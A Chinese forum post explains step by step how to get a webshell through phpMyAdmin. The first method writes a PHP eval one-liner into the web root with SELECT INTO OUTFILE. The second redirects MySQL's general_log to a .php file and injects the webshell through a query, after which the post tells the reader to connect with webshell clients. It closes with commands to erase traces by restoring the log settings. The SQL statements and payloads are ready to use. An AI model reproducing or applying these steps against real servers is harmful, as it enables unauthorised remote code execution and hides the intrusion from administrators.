找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 2780820|回复: 0

phpmyadmin如何获取shell

[复制链接]

该用户从未签到

发表于 2021-5-8 02:01:05 | 显示全部楼层 |阅读模式

您需要 登录 才可以下载或查看,没有账号?立即注册

×
前言来到phpmyadmin页面后如何getshell呢?下面介绍两种方法

                               
登录/注册后可看大图

一、select into outfile直接写入1、利用条件

[indent,对web目录需要有写权限能够使用单引号(root)
知道网站绝对路径(phpinfo/php探针/通过报错等)
secure_file_priv没有具体值
[/indent,2、查看secure_file_priv值

showglobalvariableslike'%secure%';

                               
登录/注册后可看大图

关于secure_file_priv配置介绍:
secure_file_priv 是用来限制 load dumpfile、into outfile、load_file 函数在哪个目录下拥有上传或者读取文件的权限
当 secure_file_priv 的值为NULL,表示限制 mysqld 不允许导入|导出,此时无法提权当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权我这里的secure_file_priv值为NULL,所以不能够导入或导出

                               
登录/注册后可看大图

secure_file_priv这个值是只读变量,只能通过配置文件修改。如果管理员没有配置,那么我们是无法进行写入shell的,这里我为了测试能否写入修改一下
在MySQL的配置文件my.ini中进行配置:

                               
登录/注册后可看大图

修改后secure_file_priv的值如图所示:

                               
登录/注册后可看大图

3、写入一句话

select'<?php@eval($POST[1,); ?>'INTO OUTFILE'D:\\phpStudy\\PHPTutorial\\WWW\\a.php'这里需要注意的一个点是路径需要用”\“

                               
登录/注册后可看大图

查看下根目录

                               
登录/注册后可看大图

二、利用全局日志写shell1、查看配置

查看mysql的日志状态,默认是关闭的,因为这个日志的量非常大对资源是一个比较大的开销
SHOWVARIABLESLIKE‘%general%’general_log_file为日志保存的位置

                               
登录/注册后可看大图

2、开启general_log模式

开启general_log 的作用:开启它可以记录用户输入的每条命令,会把其保存在C:\phpStudy\MySQL\data\stu1.log的文件中,其实就是我们常说的日志文件利用思路:开启general_log之后把general_log_file的值修改为该网站默认路径下的某一个自定义的php文件中,然后通过log日志进行写入一句话木马,然后再进一步利用
这里注意:在修改log路径前,源路径一定要提前记录下来,我们获取shell后还要恢复原来的路径
setglobalgeneral_log =on;

                               
登录/注册后可看大图

再查看一下日志已经开启,这时我们就可以通过全局日志写shell进根目录

                               
登录/注册后可看大图

3、修改日志目录为shell地址

setglobalgeneral_log_file='C:\\phpStudy\\MySQL\\data\\shell.php';

                               
登录/注册后可看大图

4、写入shell

因为开启了日志记录功能,所执行的sql语句都会被记录在日志中
select '<?phpeval($_POST[cmd,);?>'

                               
登录/注册后可看大图

查看下日志,发现sql语句已经被记录到了日志中,直接用菜刀或者蚁剑连接即可

                               
登录/注册后可看大图

5、抹除痕迹

setglobalgeneral_log_file='C:\\phpStudy\\MySQL\\data\\stu1.log';setglobalgeneral_log =off;

                               
登录/注册后可看大图


                               
登录/注册后可看大图

再使用日志查看命令发现已经恢复
SHOWVARIABLESLIKE'%general%'

                               
登录/注册后可看大图


                               
登录/注册后可看大图



回复

使用道具 举报

网站地图|页面地图|文字地图|Archiver|手机版|小黑屋|找资源 |网站地图

GMT+8, 2024-11-27 09:55

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表